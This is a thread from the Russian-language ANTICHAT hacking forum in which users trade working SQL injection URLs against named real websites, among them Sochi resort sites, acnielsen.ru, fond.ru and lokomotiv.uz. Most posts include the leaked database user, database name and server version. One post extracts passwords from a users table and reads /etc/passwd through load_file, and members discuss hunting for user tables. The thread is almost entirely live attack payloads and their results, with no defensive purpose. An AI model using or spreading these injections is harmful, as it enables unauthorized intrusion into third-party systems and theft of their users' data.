HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #15821  
Старый 07.02.2014, 12:36
MaxFast
Guest
Сообщений: n/a
Провел на форуме:
178623

Репутация: 94
По умолчанию

Код:
Code:
http://spa.sochi-zapolyarye.ru/index.php?menu=-16+union+select+concat(user(),0x203a3a20,database(),0x203a3a20,0x3c666f6e7420636f6c6f723d7265643e6e336d31733c2f666f6e743e)--
hot_spazapolyary@localhost :: hot_spazapolyarye

Код:
Code:
http://sochi-polyana.com/index.php?menu=-16+union+select+concat(user(),0x203a3a20,database(),0x203a3a20,0x3c666f6e7420636f6c6f723d7265643e6e336d31733c2f666f6e743e)--
krpol@localhost :: krpol

Код:
Code:
http://sochisportservice.com/index.php?menu=-16+union+select+concat(user(),0x203a3a20,database(),0x203a3a20,0x3c666f6e7420636f6c6f723d7265643e6e336d31733c2f666f6e743e)--
dom@localhost :: dom

Код:
Code:
http://respekt-avia.ru/?menu=-16+union+select+concat(user(),0x203a3a20,database(),0x203a3a20,0x3c666f6e7420636f6c6f723d7265643e6e336d31733c2f666f6e743e)--
respekt@localhost :: respekt

Одним словом - дырявая CMS
 
Ответить с цитированием

  #15822  
Старый 07.02.2014, 16:41
Unknown
Guest
Сообщений: n/a
Провел на форуме:
77731

Репутация: 33
По умолчанию

Цитата:
Сообщение от YaBtr  
YaBtr said:
=================================================
Что-то никак не могу найти там таблицу юзеров... Ты сам крутил до конца или нет? Если да то подскажи где юзеры

П.С. Angola Oil Field Supply Services

Код:
Code:
http://www.angolaoilfield.com/info.php?info_id=-7+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,version(),user(),database()),9,10,11,12,13,14,15+--+
4.1.22-log:aoss@localhost:aoss
 
Ответить с цитированием

  #15823  
Старый 07.02.2014, 16:59
YaBtr
Guest
Сообщений: n/a
Провел на форуме:
132418

Репутация: 652
По умолчанию

Цитата:
Сообщение от GhostW  
GhostW said:
Что-то никак не могу найти там таблицу юзеров... Ты сам крутил до конца или нет? Если да то подскажи где юзеры
Общаться будем через скули

По вопросу: тоже искал, но проверил не все таблицы, сайт не шибко ценный, так что, если что найдешь, будешь молодцом

pr: 5

Цитата:
Сообщение от None  
http://
www.legacy-project.org
/index.php?page=event_detail&eventID=10+and+1=2+uni on+select+1,version(),3,4+--+
=================================================
 
Ответить с цитированием

  #15824  
Старый 08.02.2014, 03:06
MaxFast
Guest
Сообщений: n/a
Провел на форуме:
178623

Репутация: 94
По умолчанию

Код:
Code:
http://www.acnielsen.ru/news.php?news_id=-16+union+select+1,concat(user(),0x203a3a20,database(),0x203a3a20,0x3c666f6e7420636f6c6f723d7265643e6e336d31733c2f666f6e743e),3,4,5,6,7--
u140989@10.8.1.203 :: u140989

Код:
Code:
http://www.prostor2000.ru/show_cat.php?catid=-13%27+union+select+1,2,3,concat(user(),0x203a3a20,database(),0x203a3a20,0x3c666f6e7420636f6c6f723d7265643e6e336d31733c2f666f6e743e),5,6,7,8,9+--+
prostor@localhost :: prostor
 
Ответить с цитированием

  #15825  
Старый 09.02.2014, 10:09
MaxFast
Guest
Сообщений: n/a
Провел на форуме:
178623

Репутация: 94
По умолчанию

Код:
Code:
http://www.fond.ru/index.php?menu_id=-370+union+select+concat(0x3a,version(),0x3c63656e7465723e3c696d67207372633d687474703a2f2f666f72756d2e616e7469636861742e72752f617661746172732f6176617461723137353937372e6769663e3c2f63656e7465723e)--
5.1.41-log

тИЦ = 1200, PR = 5
 
Ответить с цитированием

  #15826  
Старый 09.02.2014, 15:57
Unknown
Guest
Сообщений: n/a
Провел на форуме:
12774

Репутация: 12
По умолчанию

Код:
Code:
http://www.irishsanghatrust.ie/news.php?id=-33+union+select+1,version%28%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+--+
5.0.83-community

u1094094_sangha@172.16.5.126

Код:
Code:
http://www.raahauges.com/view-news.php?id=-8+union+select+1,2,version%28%29,4,5+--+
5.5.33a-MariaDB

raahauge_cms@raptor13.nextmill.net
 
Ответить с цитированием

  #15827  
Старый 09.02.2014, 17:48
Unknown
Guest
Сообщений: n/a
Провел на форуме:
77731

Репутация: 33
По умолчанию

Привет узбекскому Локомотиву!

Код:
Code:
http://lokomotiv.uz/news.php?id=-794+union+select+@@version,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22--
5.1.68-CLL-LVE
 
Ответить с цитированием

  #15828  
Старый 11.02.2014, 02:55
Win32BOT
Guest
Сообщений: n/a
Провел на форуме:
23886

Репутация: -3
По умолчанию

Код:
Code:
http://sorrentosolemare.ru/info.php?info_id=-20+union+select+1,concat_ws(user(),database(),version()),3,4,5,6,7,8+--+
 
Ответить с цитированием

  #15829  
Старый 11.02.2014, 07:07
ocheretko
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме:
29

Репутация: 0
По умолчанию

Код:
Code:
http://www.lakedirectory.net/page.php?id=2+and+1=0+%20Union%20Select%20%201%20,2,3,4,5,6,7,8,9,10,11,%20UNHEX(HEX(CONCAT(CHAR(64),CHAR(95),CHAR(64),pass,char(59),CHAR(64),CHAR(95),CHAR(64))))%20+FROM+lgg.pmd_users%20%20LIMIT%201,1--
Код:
Code:
http://www.lakedirectory.net/page.php?id=2+and+1=0+%20Union%20Select%20%201,2,3,4,5,6,7,8,9,10,11,%20UNHEX(HEX(CONCAT(0x5B6B65795D,load_file(0x2F6574632F706173737764),0x5B6B65795D)))%20--
при переходе происходит редирект на ссылку, которая содержит вывод данных
 
Ответить с цитированием

  #15830  
Старый 11.02.2014, 13:01
DezMond™
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
Провел на форуме:
961428

Репутация: 662
Отправить сообщение для DezMond™ с помощью ICQ
По умолчанию

PR7

http://www.lebenslanges-lernen.at/erasmus_outgoing/index.php?lng=de&sekt=1&txt=hei&eracode=-SOFIA27'+union+select+user(),2,3,4,5,6,7,8,9,10,11 +--+
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ